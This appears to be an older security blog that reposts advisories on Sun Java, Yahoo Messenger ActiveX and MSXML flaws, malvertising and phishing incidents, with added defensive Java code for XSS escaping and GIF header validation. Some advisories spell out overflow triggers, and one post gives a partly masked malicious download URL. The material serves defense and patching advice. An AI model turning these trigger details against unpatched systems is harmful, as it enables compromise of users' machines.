August 23, 2007

Sun JRE Font Parsing Vulnerability

HIGHLY CRITICAL
Description:
A vulnerability has been reported in Sun JRE, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an unspecified error in the parsing of fonts contained in Java applets. This can be exploited by malicious, untrusted applets to read and write local files, or to execute local applications.

The vulnerability is reported in the following products:
* JDK and JRE 5.0 Update 9 and earlier
* SDK and JRE 1.4.2_14 and earlier

Solution:
Update to the latest versions or apply patches:

JDK and JRE 5.0 Update 10 or later
http://java.sun.com/j2se/1.5.0/download.jsp

SDK and JRE 1.4.2_15 or later
http://java.sun.com/j2se/1.4.2/download.html

Why am I not surprised that there's another issue with applets and Sun's java runtime ?
And remember, bunkies, the java autoupdater does not remove older, vulnerable versions !
One must uninstall it/them from Add/Remove Programs in the Control Panel on Windows OS'.

June 18, 2007

Q&A with the Security MVP Experts

From Microsoft Technet Upcoming Chats

We invite you to attend a Q&A with the Microsoft Security MVPs. In this chat the MVP experts will answer your questions regarding online safety issues such as phishing, spyware, rootkits as well as server-related topics. If you have questions on how to protect your PC, please bring them to this informative chat.

When: Thursday June 21st

Time: 4pm PST and 7pm EST

Where: TechNet Chat Room

No password required

Clicking on the TechNet Chat Room link will lead one to a sign in page that looks like this
Microsoft.com Chat
To view this specialized content, you are required to sign in with a Windows Live™ ID.
Don't have a Windows Live™ ID?
If you have a Hotmail address, MSN e-mail address, or Microsoft Passport, it's already a Windows Live ID.

You can sign in here with your existing e-mail address and password.
Sign up now to use one Windows Live ID to sign in to Windows Live, Microsoft.com, MSN, and Microsoft Passport sites.

If you do not have a "Windows Live™ ID", then you can obtain one by following the above instructions.
If you do not desire a "Windows Live™ ID", then you cannot attend the chat session.

Microsoft established this requirement, MVPs did NOT !

May 10, 2007

Java Security Traps Getting Worse

The never ending battle to get Sun to DO SOMETHING about their Java 'product' is NOT OVER
From : Java Security Traps Getting Worse

A year ago at JavaOne, Fortify Software Founder and Chief Scientist Brian Chess gave a presentation titled "12 Java Technology Security Traps and How to Avoid Them."

A year later, how far have we come in addressing those inherent vulnerabilities, which include XSS (cross-site scripting), SQL injection and native methods that allow the import of C or C++ code—along with its bugs? Not a smidge—unless you count going backwards.

It's gotten worse, Chess said in an interview with eWEEK, "and I've got evidence to prove it."

Fortify, which markets source-code analysis technology, has access to a large database of common Java programming errors and vulnerabilities, gleaned not only from its customers but also from a year of running the Java Open Review project.

In that project, Fortify uses FindBugs, a static analysis tool that looks for bugs in Java code, to look over code in open-source projects such as Apache, Azureus and Tomcat. Fortify does an analysis on each inspected code set, publishes online how many issues it finds and then shares with project maintainers the vulnerability specifics.

What Fortify has found from running the project is that the defect density of open-source code is "astronomical," Chess said, pointing out one project in particular that Fortify has inspected over the past year: Net Trust, with an estimated 12.215 errors per 1,000 lines of code.

"That's huge for a project with 'trust' in its name," Chess said.

Ironically enough, Net Trust is a Google project to create a security mechanism for simple single sign-on and authentication. "But they were students doing not very good code," Chess said.

Net Trust is one of many examples that demonstrate that Java security traps, although known for some time, are snaring more programmers all the time as use of the language grows.

To illustrate the lack of secure coding instruction, Chess points to a recent find he made, from none less than the Java giant, Sun. Specifically, the Sun introduction to servlet programming (Sun's simplest method for hooking Java up to the Web) contains cross-site scripting vulnerabilities.

One example of an XSS vulnerability is these lines from Sun's instructions:

    try {
        firstname = request.getParameter("firstname");
    } catch (Exception e) {
        e.printStackTrace();
    }

    userName = firstname;

    ...

    pw.print("Thanks for your feedback, " + userName + "!");

This code allows an attacker to inject code into the application that will be executed on a victim's browser, Chess said.

"The code expects that a user has entered a name like this: Bob," Chess wrote in an e-mail exchange. "But an attacker could set it up so that the data looks like this: and then the victim's browser would execute a function named sendDataToMotherShip()."

A secure version of the server-side code, Chess said, would check input to make sure that it only contains an expected set of characters and no executable scripts.

"SQL injection problems still do sit at the top of the list" of Java security traps, he said. "[Developers are] trusting input they shouldn't trust."

If this is coming from Sun, who can we trust? "You'll see that the tutorial never mentions security," Chess said. "With that in mind, it's not surprising that it contains cross-site scripting vulnerabilities."
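The fix Chess describes, as an added example in plain Java that is not Sun's tutorial code or anything from the article: renderUnsafe mirrors the tutorial's concatenation, renderSafe allow-lists the name and HTML-encodes it before it reaches the page. The permitted character set and the 50-character limit are this example's own assumptions.

```java
// Added example, not code from Sun's servlet tutorial or the eWEEK article.
// Contrasts the tutorial's feedback line with an allow-listed, HTML-escaped version.
import java.util.regex.Pattern;

public class FeedbackXss {

    // Mirrors the tutorial: the request parameter goes straight into the HTML
    // that pw.print() writes, so any markup in userName reaches the browser intact.
    static String renderUnsafe(String userName) {
        return "Thanks for your feedback, " + userName + "!";
    }

    // Allow-list from the article's advice ("only contains an expected set of
    // characters"): letters, spaces, apostrophes and hyphens, up to 50 characters.
    // The character set and length limit are this example's assumptions.
    private static final Pattern EXPECTED_NAME =
            Pattern.compile("[A-Za-z][A-Za-z '\\-]{0,49}");

    static boolean isExpectedName(String userName) {
        return userName != null && EXPECTED_NAME.matcher(userName).matches();
    }

    // Output encoding for an HTML text context; applied even after validation so
    // the page stays safe if the allow-list is later widened.
    static String htmlEscape(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Hardened replacement for the tutorial line: validate, then encode.
    static String renderSafe(String userName) {
        if (!isExpectedName(userName)) {
            // Reject rather than repair: unexpected input never reaches the page.
            return "Thanks for your feedback!";
        }
        return "Thanks for your feedback, " + htmlEscape(userName) + "!";
    }

    public static void main(String[] args) {
        // Constructed inputs: the name the tutorial expects, and one carrying markup.
        String[] inputs = { "Bob", "<b>Bob</b>" };
        for (String in : inputs) {
            System.out.println("input : " + in);
            System.out.println("unsafe: " + renderUnsafe(in));  // markup passes through
            System.out.println("safe  : " + renderSafe(in));    // markup rejected
            System.out.println();
        }
    }
}
```

In a servlet the string returned by renderSafe is what would be handed to pw.print() in place of the tutorial's concatenation.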

May 7, 2007

Sophos Report: April Brings A Deluge Of Web Attacks

FROM: Sophos announces top ten web and email-borne threats reported in April

Mal/Iframe dominated the web-based malware chart in April, accounting for nearly half of the world's web threats. Iframe-based malware operates like a growing number of web-based attacks, looking for vulnerabilities on legitimate hosted websites and injecting malicious code onto the site. Once the site is infected, unwary visitors without web security, firewall or patches on their PCs can themselves be infected.

"The Iframe-based attacks are a perfect example of a prolific web threat that target vulnerable sites - it doesn't care whether the site is hosting pornography or gardening tips," said Carole Theriault, senior security consultant at Sophos. "This problem is not just a niggle: Sophos research shows that a whopping 70% of web-based malware is being hosted on innocent but exploited websites. With people being lured to these innocent but compromised webpages via cleverly worded email invitations, web security has to go beyond blocking websites based upon category alone. A secure web defense will also scan pages for malicious content, regardless of whether they are on a site you would normally consider 'safe'."


Bunkies, make sure that the system is adequately protected !
1) Keep the installed antivirus software updated and ensure that the subscription is current !
2) Make sure that the native Windows XP SP2 firewall is turned on. If a 3rd party firewall has been installed, use it !
3) Ensure that the system is properly updated and patched ! The 'bad guyz' can't get in if the system is protected !
4) Ensure that those wonderful web applications and web browsers are also updated to the latest version ! [Firefox, Opera, IE, Adobe FlashPlayer, Apple's QuickTime, Windows MediaPlayer, etc]
5) And above all, practice safe hex !

April 25, 2007

Winfixer and ValueClick in bed together ?

From Winfixer and ValueClick – an oft appearing association, as blogged by MVP Sandi Hardmeier

My regular readers will remember my various articles about the Winfixer infiltration of the AOL and MSN advertising networks that happened not long ago. Winfixer infiltration of Web site advertising (as well as forum and comment spam) continues to be problematic, and one name that keeps on popping up over and over again is adfarm.mediaplex.com (Mediaplex is owned by ValueClick). The problem seems to be so endemic that any web site, forum or Web comment that utilises links that redirect to adfarm.mediaplex.com are potentially placing their visitors at risk of a Winfixer infection.

Over the past couple of months I have had in-person and telephone conferences with representatives and technical staff at MSN and AOL as a direct result of the Winfixer infiltrations of various advertising networks. They have learned a lot from the events of the past few months, as have I. I don't think any of us realised how widespread the problem was, or just how sophisticated the bad guys were getting, until we started taking a close look.

Mike Burgess and I have been having a close look at adfarm.mediaplex.com. I have tried to contact ValueClick regarding the adfarm.mediaplex.com problems using their “contact us” page on their Web site, but as of yet have received no response (and those of you that know me well know that a failure to respond is sure to intensify the attention that I pay to a problem advertisement network). I will be contacting them directly via an email address given to me by an associate as soon as this article goes live, and will report on their responses, if any.


WinFixer is known as a "Rogue Security Product". Microsoft’s definition of “Rogue Security Products” is:
These products appear under a variety of names and produce a variety of results for the end user, ranging from limited or no detection capability, coupled with a fraudulent request to pay for a “full” version, to outright malicious behavior, such as installing malicious software without the user’s consent in order to give the product something to detect. In many cases, the people behind such software would attempt to get the infected individual to pay them for removal of purported infections using fraud and social engineering.

Please take the time to read Sandi's fine article and follow her valiant attempt to halt the disingenuous spread of the WinFixer plague.

April 5, 2007

From Secunia.com
Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow


Secunia Advisory: SA24742

Release Date: 2007-04-04

Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: Yahoo! Messenger 5.x
Yahoo! Messenger 6.x
Yahoo! Messenger 7.x
Yahoo! Messenger 8.x

Description:
A vulnerability has been reported in Yahoo! Messenger, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error within the AudioConf ActiveX control (yacscom.dll) component of Yahoo! Messenger. This can be exploited to cause a stack-based buffer overflow by setting the "socksHostname" and "hostName" properties to an overly large string and then calling the "createAndJoinConference()" method.

Successful exploitation allows execution of arbitrary code when a user visits a malicious web site.

The vulnerability is reported in version 8.x. Other versions may also be affected.

Solution:
Update to the latest version.

Set the kill-bit on the affected ActiveX control

Get that YMessenger patched real fast, bunkies. ;)

March 27, 2007

AOL and Winfixer.. the malware advertisements should be gone.. for now.

From : Spyware Sucks
Owned by Sandi Hardmeier - a Microsoft MVP since 1999 specialising in Internet Explorer

A contact at Microsoft put me in touch with the appropriate people at AOL this morning - an advertising tech lead and a gentleman involved in policy and compliance. Thanks to a network capture that I gave to AOL they were finally able to track down the rogue advertiser who had infiltrated the AOL ad network to serve up winfixer malware advertisements.

Once the guys at AOL and I actually hooked up, it only took a few hours to get the account shut down. Damned if I know why it took for us to connect, but it did.

AOL's official statement on the incident is:

"We use a wide range of technical and policy measures to prevent malware distributors from placing advertisements on our networks, but apparently one was able to circumvent those measures. We have blocked this ad campaign and [are] working with our technical and legal teams to take additional steps to block similar issues in future."


Score another one for the good guys. Too bad Winfixer maggots.
Crawl back into the hole from whence you emerged ....

March 26, 2007

What the hell does it take to get AOL to clean up their advertising network?

From : Spyware Sucks
Owned by Sandi Hardmeier - a Microsoft MVP since 1999 specialising in Internet Explorer

This is simply not good enough.

MSN / Microsoft acted fast when *their* advertising network was infiltrated. AOL, it seems, are either incapable or unwilling to do anything to protect their readers.

The following was captured only minutes ago. This has been going on for days now, yet AOL remains unresponsive, leaving how many millions of users at direct risk of winfixer infection. I am going to use every means at my disposal, pull every string, take advantage of every relationship, to try and convince AOL to act.

If AOL will only act under a barrage of negative press, then so be it. Reality is that MS/MSN reacted, and reacted fast, when their network was infiltrated. I won't share exactly what MSN/MS did, but I will say that they took extremely strong steps to neutralise the risk to their users - steps that proved to me beyond a shadow of a doubt that MS and MSN were putting the safety of their users before everything else - steps that AOL seem to be unwilling or unable to take.

YO, AOL ! What's your problem ? Why is your User Base being exposed to this malware ? This is an ongoing issue !
The AOL advertisement network has DEFINITELY been infiltrated by winfixer. That article was published last week. Get off your butts and DO SOMETHING ALREADY !
Fix it or get fried, baby.

January 23, 2007

Sun Updates for Multiple Vulnerabilities in Java

From US-CERT Technical Cyber Security Alert TA07-022A

Original release date: January 22, 2007
Last revised: --
Source: US-CERT

Systems Affected
Sun Java Runtime Environment versions

* JDK and JRE 5.0 Update 9 and earlier
* SDK and JRE 1.4.2_12 and earlier
* SDK and JRE 1.3.1_18 and earlier


Overview

The Sun Java Runtime Environment contains multiple vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.

I. Description

The Sun Java Runtime Environment (JRE) allows users to run Java applications in a browser or as standalone programs. Sun has released updates to the Java Runtime Environment software to address multiple vulnerabilities. Further details about these vulnerabilities are available in the Vulnerability Notes Database.

Note that exploit code is publicly available for at least one of these vulnerabilities.

II. Impact

By convincing a user to run a specially crafted Java application, a remote, unauthenticated attacker can execute arbitrary code on a vulnerable system. A common attack vector would be a web page that contains a Java applet.

III. Solution
Apply an update from Sun

These issues are addressed in the following versions of the Sun Java Runtime environment:

* JDK and JRE 5.0 Update 10 or later
* SDK and JRE 1.4.2_13 or later
* SDK and JRE 1.3.1_19 or later

If you install the latest version of Java, older versions of Java may remain installed on your computer. If these versions of Java are not needed, you may wish to remove them. For instructions on how to remove older versions of Java, refer to the following instructions from Sun.

The older versions will remain installed. One must manually uninstall older, vulnerable versions. Of course, certain applications will need to be rewritten so they function with the latest safe JRE, but the way Sun is heading, no version looks like it will be safe for long.
C'mon Sun, WAKE UP and smell the security cluestick !!!

Sun Java : What you don't know CAN hurt you

Since Sun's security position cannot be taken seriously, as evidenced by the never-ending articles I've been writing here, let's see what the latest security issue they've sat on and kept hidden for the past SEVEN MONTHS is: Java brews critical bug

A bug in the Java Runtime Environment (JRE) can leave corporate systems open to attack if a user visits a site containing malicious code, security researchers have warned.

The bug affects Windows, Linux and Solaris, and Sun has released a patch.

The JRE includes the Java Virtual Machine and supporting executables and files, and contains safeguards that prevent applets from causing trouble on the wider system. The newly disclosed flaw allows applets to upgrade their privileges, effectively giving them free access to the rest of the system, Sun said in an advisory.

"For example, an applet may grant itself permissions to read and write local files or execute local applications with the privileges of the user running the untrusted applet," Sun said.

The specific bug is to do with the processing of GIF image components, according to the Zero Day Initiative (ZDI), a bounty-oriented program run by 3Com's TippingPoint, which bought rights to disclosure from an anonymous researcher.

"When the image width in an image block of a valid GIF file is set to 0, the Java runtime will allocate the specified size but subsequently copy all data to the under allocated memory chunk," ZDI said in its advisory. "The overflow results in the corruption of multiple pointers, at least one of which is later dereferenced and can therefore result in execution of arbitrary code."

ZDI originally informed Sun of the problem back in June, the organization said.

Secunia, a third-party security company based in Denmark, said the problem was one of the most serious to have affected Java in some time. Secunia said the bug was "highly critical".

The bug affects Java Development Kit (JDK) and JRE 5.0 Update 9 and prior, Java Software Development Kit (SDK) and JRE 1.4.2_12 and prior, and SDK and JRE 1.3.1_18 and prior.

To paraphrase a Bill Clinton campaign slogan, 'It's the applets, stupid'.
How many Users were bitten by this vulnerability ? Do worms like applets ?
Stay tuned for the never ending saga of
Sun Java: Security through meditation
Or, if we pretend it's safe, it is safe
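The condition ZDI describes above (image width declared as 0 while the pixel data is copied in full), as an added example that is not Sun's or ZDI's code: a GIF image-descriptor check of the kind a hardened decoder runs before allocating and copying. The logical-screen bound is this example's own extra assumption, and the 1x1 GIF is a constructed sample.

```java
// Added example, not Sun's or ZDI's code. A consistency check on GIF image
// descriptors that a hardened decoder should perform before allocating pixels.
import java.nio.charset.StandardCharsets;

public class GifDescriptorCheck {

    // Little-endian 16-bit field, as GIF stores all dimensions.
    static int u16(byte[] b, int off) {
        return (b[off] & 0xFF) | ((b[off + 1] & 0xFF) << 8);
    }

    // Advances past a chain of data sub-blocks (length byte, data, ..., 0 terminator).
    static int skipSubBlocks(byte[] b, int pos) {
        while (true) {
            if (pos >= b.length) throw new IllegalArgumentException("truncated sub-blocks");
            int n = b[pos++] & 0xFF;
            if (n == 0) return pos;
            pos += n;
        }
    }

    // Walks the file block by block and returns the total pixel count declared by
    // its image descriptors. Throws on any descriptor a decoder could not safely
    // allocate from: zero width or height, or an image outside the logical screen.
    static long validate(byte[] gif) {
        if (gif.length < 13) throw new IllegalArgumentException("truncated header");
        String sig = new String(gif, 0, 6, StandardCharsets.US_ASCII);
        if (!sig.equals("GIF87a") && !sig.equals("GIF89a")) {
            throw new IllegalArgumentException("not a GIF signature");
        }
        int screenW = u16(gif, 6), screenH = u16(gif, 8);
        int packed = gif[10] & 0xFF;
        int pos = 13;
        if ((packed & 0x80) != 0) pos += 3 * (1 << ((packed & 0x07) + 1)); // global color table
        long pixels = 0;
        while (pos < gif.length) {
            int block = gif[pos++] & 0xFF;
            if (block == 0x3B) return pixels;                  // trailer
            if (block == 0x21) {                               // extension: label + sub-blocks
                pos = skipSubBlocks(gif, pos + 1);
                continue;
            }
            if (block != 0x2C) {
                throw new IllegalArgumentException("unknown block 0x" + Integer.toHexString(block));
            }
            if (pos + 9 > gif.length) throw new IllegalArgumentException("truncated image descriptor");
            int left = u16(gif, pos), top = u16(gif, pos + 2);
            int w = u16(gif, pos + 4), h = u16(gif, pos + 6);
            int ipacked = gif[pos + 8] & 0xFF;
            pos += 9;
            // The ZDI condition: width 0 makes the allocation zero-sized while the
            // data sub-blocks still carry pixels. Reject it instead of copying into it.
            if (w == 0 || h == 0) throw new IllegalArgumentException("zero image dimension");
            if (left + w > screenW || top + h > screenH) {
                throw new IllegalArgumentException("image exceeds logical screen");
            }
            if ((ipacked & 0x80) != 0) pos += 3 * (1 << ((ipacked & 0x07) + 1)); // local color table
            pos++;                                             // LZW minimum code size
            pos = skipSubBlocks(gif, pos);
            pixels += (long) w * h;
        }
        throw new IllegalArgumentException("missing trailer");
    }

    public static void main(String[] args) {
        // Constructed input: a well-known minimal 1x1 GIF, 35 bytes.
        byte[] ok = { 0x47, 0x49, 0x46, 0x38, 0x39, 0x61,
                      0x01, 0x00, 0x01, 0x00, (byte) 0x80, 0x00, 0x00,
                      0x00, 0x00, 0x00, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF,
                      0x2C, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00,
                      0x02, 0x02, 0x44, 0x01, 0x00, 0x3B };
        System.out.println("valid file declares " + validate(ok) + " pixel(s)");

        // Same file with the image width field (bytes 24-25) zeroed, as in the advisory.
        byte[] zeroWidth = ok.clone();
        zeroWidth[24] = 0;
        zeroWidth[25] = 0;
        try {
            validate(zeroWidth);
            System.out.println("unexpected: zero-width descriptor accepted");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The decoder that follows such a check must still bound every pixel write by the w * h buffer it allocated, since the sub-block lengths say nothing about how many pixels the LZW stream decodes to.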

December 23, 2006

Santa's Site Hacked

The Heathens have hacked Santa ! No, I'm not kidding. The source code of the Genuine Santa Page shows an iFrame that contains http://81.xxx.3.1xx/sp2_update/index.php . Once the iFrame is launched the javascript attempts to download and install file.exe. Scanning the file at VirusTotal shows

Complete scanning result of "file.exe", received in VirusTotal at 12.23.2006, 20:24:44 (CET).

Antivirus - Version - Update - Result
AntiVir 7.3.0.21 12.22.2006 HEUR/Malware
Authentium 4.93.8 12.22.2006 Possibly a new variant of W32/Dlr-Trojan-Malware-based!Maximus
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.23.2006 no virus found
BitDefender 7.2 12.23.2006 Generic.Malware.Bdld!!.39E6F2BB
CAT-QuickHeal 8.00 12.23.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.23.2006 no virus found
DrWeb 4.33 12.23.2006 DLOADER.Trojan
eSafe 7.0.14.0 12.23.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.97 12.23.2006 no virus found
eTrust-Vet 30.3.3271 12.23.2006 no virus found
Ewido 4.0 12.23.2006 no virus found
Fortinet 2.82.0.0 12.23.2006 suspicious
F-Prot 3.16f 12.22.2006 Possibly a new variant of W32/Dlr-Trojan-Malware-based!Maximus
F-Prot4 4.2.1.29 12.22.2006 W32/Dlr-Trojan-Malware-based!Maximus
Ikarus T3.1.0.27 12.23.2006 no virus found
Kaspersky 4.0.2.24 12.23.2006 no virus found
McAfee 4925 12.22.2006 no virus found
Microsoft 1.1904 12.23.2006 no virus found
NOD32v2 1936 12.23.2006 probably a variant of Win32/TrojanDownloader.Small.AIF
Norman 5.80.02 12.22.2006 W32/Suscpious_F.gen
Panda 9.0.0.4 12.23.2006 Suspicious file
Prevx1 V2 12.23.2006 no virus found
Sophos 4.12.0 12.22.2006 Mal/Packer
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 6.0.3.135 12.20.2006 no virus found
UNA 1.83 12.22.2006 no virus found
VBA32 3.11.1 12.23.2006 suspected of Win32.Trojan.Downloader (http://...)
VirusBuster 4.3.19:9 12.23.2006 novirus:Packed/FSG

Apparently, this code attempts to exploit the vulnerability in Microsoft Security Bulletin MS06-071
Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (928088)
A vulnerability exists in the XMLHTTP ActiveX control within Microsoft XML Core Services that could allow for remote code execution. An attacker could exploit the vulnerability by constructing a specially crafted Web page that could potentially allow remote code execution if a user visited that page or clicked a link in an e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system. However, user interaction is required to exploit this vulnerability.
As far as I see this, once the page is visited the malware file will be downloaded and run because of the vulnerability in the XMLHTTP ActiveX control.
Make sure that this update is installed already by going to Add/Remove Programs in the Control Panel. It will not be listed under Windows XP - Software Updates, but rather will be listed as
MSXML 4 SP2 (KB927978)

If, for some reason, the update is not installed, please go to the Security Bulletin page and click the Download the update link under Affected components for the version of MSXML that is currently installed.
In order to determine which version is installed if there are no MSXML packages listed in Add/Remove Programs,
check the WINDOWS\system32 folder for :

Msxml4.dll
and
Msxml6.dll

If either are present, right click it, choose Properties, and then click the Version tab.
The files contained in the update are the following Versions:

Msxml4.dll Version number 4.20.9841.0
Msxml6.dll Version number 6.0.3890.0

Both are dated 11/4/2006
If you've had an issue installing KB929798, then check to see if KB925672 is installed in Add/Remove Programs.
If it is, uninstall it, reboot, then install KB929798 and reboot again, as it supersedes KB925672.

From the Secunia Advisory :

Description:
A vulnerability has been discovered in Microsoft XML Core Services, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an error in the XMLHTTP ActiveX Control (msxml4.dll) within the "setRequestHeader()" method.

Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website using Internet Explorer.

The vulnerability is confirmed on a fully patched Windows XP SP2 system with msxml4.dll version 4.20.9818.0 installed. Other versions may also be affected.

NOTE: The vulnerability is already being actively exploited.


Ho, Ho, Ho !

December 22, 2006

The 'Hits' From Sun Just Keep On Coming

From our 'buddies' at Sun : Vulnerabilities in the Java Runtime Environment may Allow Untrusted Applets to Elevate Privileges and Execute Arbitrary Code

Impact

Two buffer overflow vulnerabilities in the Java Runtime Environment may independently allow an untrusted applet to elevate its privileges. For example, an applet may grant itself permissions to read and write local files or execute local applications that are accessible to the user running the untrusted applet.

Sun acknowledges, with thanks, Chris Evans, for bringing these issues to our attention.
2. Contributing Factors

These issues can occur in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 7 and earlier
* SDK and JRE 1.4.2_12 and earlier
* SDK and JRE 1.3.1_18 and earlier

Vulnerabilities in the Java Runtime Environment may Allow an Untrusted Applet to Access Data in Other Applets
Impact
Two vulnerabilities in the Java Runtime Environment may independently allow an untrusted applet to access data in other applets.

Sun acknowledges, with thanks, Tom Hawtin, for bringing these issues to our attention.
2. Contributing Factors

The first issue can occur in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 5 and earlier
* SDK and JRE 1.4.2_10 and earlier
* SDK and JRE 1.3.1_18 and earlier

The second issue can occur in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 6 and earlier
* SDK and JRE 1.4.2_12 and earlier
* SDK and JRE 1.3.1_18 and earlier

Vulnerabilities Related to Serialization in the Java Runtime Environment may Allow Untrusted Applets to Elevate Privileges
Impact

Two vulnerabilities related to serialization in the Java Runtime Environment may independently allow an untrusted applet or application to elevate its privileges.

Sun acknowledges, with thanks, Tom Hawtin, for bringing these issues to our attention.
2. Contributing Factors

These issues can occur in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 7 and earlier
* SDK and JRE 1.4.2_12 and earlier

Note: SDK and JRE 1.3.x are not affected.

The only safe versions of the JRE/JDK/SDK/J2SE, as far as I know or believe Sun, are
Resolution

These issues are addressed in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 8 or later
* SDK and JRE 1.4.2_13 or later

Note: JRE 5.0 Update 8 for Solaris was also delivered in the following patches:

* J2SE 5.0: update 8 (as delivered in patch 118666-07)
* J2SE 5.0: update 8 (as delivered in patch 118667-07 (64bit))
* J2SE 5.0_x86: update 8 (as delivered in patch 118668-07)
* J2SE 5.0_x86: update 8 (as delivered in patch 118669-07 (64bit))

The latest releases for J2SE are available for download at:

J2SE 5.0:

* http://java.sun.com/javase/downloads/index_jdk5.jsp
* http://java.com

J2SE 5.0 Update 9 for Solaris is also available in the following patches:

* J2SE 5.0: update 9 (as delivered in patch 118666-09)
* J2SE 5.0: update 9 (as delivered in patch 118667-09 (64bit))
* J2SE 5.0_x86: update 9 (as delivered in patch 118668-09)
* J2SE 5.0_x86: update 9 (as delivered in patch 118669-09 (64bit))

J2SE 1.4.2 is available for download at:

* http://java.sun.com/j2se/1.4.2/download.html

Of course, depending on Sun's 'information' is like depending on a crack addict to tell the truth.
It's the applets, stupid !
And, remember to uninstall the older, vulnerable versions from Add/Remove Programs in the Control Panel after installing the latest 'secure' Java Runtime.
The latest Update to Version 5.0 is Update 10.
For those who are already running Vista, it's highly recommended that Java Runtime Environment (JRE) 6 be installed.

For further laughs check this out Java SE Naming and Versions

The current release is Java Platform, Standard Edition 6 (Java SE 6). The previous release was Java 2 Platform, Standard Edition 5.0 (J2SE 5.0).

Sun Microsystems simplified the platform name in 2006 to better reflect the level of maturity, stability, scalability, and security built into the Java platform. Sun dropped the "2" from the name and deleted the "dot number" (the number following the period). Any updates to Java platforms will simply be noted as updates rather than adding a "dot number" at the end of the platform name.

Due to significant popularity within the Java developer community, the development kit has reverted back to the name "JDK" from "Java 2 SDK" (or "J2SDK"). The runtime environment has reverted back to "JRE" from "J2RE." (Note that "JDK" stands for "J2SE Development Kit" in version 5.0.)

For more information on platform names and version numbers, see the following pages:

* Java SE 6 Platform Name and Version Numbers
* J2SE Version 1.5.0 or 5.0?
* J2SE SDK/JRE Version String Naming Convention

December 11, 2006

Further Follies of Sun Java (Security Mowrons of the Year)

Version 6 of the Sun JRE was released today. Don't hold your breath waiting for the so-called java autoupdater to notify you of its availability, though. In fact, while checking out the latest version of Sun's JRE, I came across their Manual Download web page.
Trouble is, the version offered there is v.1.5.0_09. The latest v.5 Java is now at 1.5.0_10 !
So, WHY is it not being offered ?
Better yet, going to the Verify Installation page tells me that the latest version is installed.

Description -- Your Environment
Java Runtime Vendor: Sun Microsystems Inc.
Java Runtime Version 1.5.0_09

CONGRATULATIONS, you have the Latest version of Java!
WRONG !
Thanks, Sun for a job NOT well done. Pathetic boobs.
Your arrogance towards security leads me to nominate Sun as Security Mowron of the Year

November 20, 2006

Thank you Sun, may I have another ?

A Security Vulnerability in the Java Runtime Environment Swing Library may Allow an Untrusted Applet to Access Data in Other Applets

* Date Released: 14-Nov-2006
* Date Closed: 14-Nov-2006

1. Impact

A security vulnerability in the Java Runtime Environment Swing library may allow an untrusted applet to access data in other applets.

Sun acknowledges, with thanks, Tom Hawtin, for bringing this issue to our attention.
2. Contributing Factors

This issue can occur in the following releases (for Solaris, Linux and Windows platforms):

* JDK and JRE 5.0 Update 7 and earlier

Note: SDK and JRE 1.4.2_xx and earlier and 1.3.1_xx and earlier are not affected by this issue.

To determine the default version of the JRE on a system for Solaris and Linux, the following command can be run:

% java -version

Note: The above command only determines the default version. Other versions may also be installed on the system.

To determine the default version of the JRE on a system for Windows:

1. Click "Start"
2. Select "Run"
3. Type "cmd" (starts a command-line)
4. At the prompt, type "java -version"

Note: The above command only determines the default version. Other versions may also be installed on the system.
3. Symptoms

There are no reliable symptoms that would indicate the described issue has been exploited.

Solution Summary
4. Relief/Workaround

There is no workaround. Please see the "Resolution" section below.

5. Resolution

This issue is addressed in the following releases:

* JDK and JRE 5.0 Update 8 and later (for Solaris, Linux and Windows)

J2SE 5.0 is available for download at the following links:

* http://java.sun.com/j2se/1.5.0/download.jsp
* http://java.com

So, how long has Sun known about this vulnerability ? Since they are not forthcoming in releasing vulnerabilities, how many folks have been exploited due to this vuln ?

Why does Sun behave in such an arrogant manner ? If Microsoft behaved as Sun does it would be a big media circus with the whining and gnashing of teeth over MS' arrogant, monopolistic behavior .
So, just what is it with Sun ?
The java autoupdater is BROKEN. I waited over a month for it to update the java package on my system just out of curiosity. The latest update brought the J2SE up to v. 1.5.0_09. Now, what if v.1.5.0_07 had been the J2SE and the system had been to a site with a malicious java applet that had used the vuln to ... access data in other java applets.
WHAT would have happened ? Should I guess or wait until Sun imparts their knowledge to the rest of the World ?
AND, the autoupdating mechanism does NOT remove older, vulnerable versions of the runtimes.

According to Sun, starting with the v.1.5.0_06 J2SE, no runtimes could be utilized by malwares. OK, thanks.
Now, why are applets exploitable and just what the heck IS the exploit ?

November 11, 2006

MySpace Phish Met With Hosting Provider Apathy

From DSL Reports -
MySpace Phish Met With Hosting Provider Apathy: What's the responsibility of hosting providers?

Yesterday we reported on a widespread phishing attack on MySpace, in which personal profiles had their HTML gamed to entirely overlay the usual look and feel with what appeared to be a real MySpace login page. A valid page should be hosted at login.myspace.com, but since this one was at myspace.com, it would have fooled even most phishing experts. Users have been told to watch the URL, and we're sure many did. Oops.

When the user submitted the phake form, it passed the user's name and password to a login.php script hosted on a third-party website, which dumped the data into a file. The user was then rerouted to the standard MySpace login. Users would presumably believe they had simply mistyped their password and would try again, unaware that they had been conned.

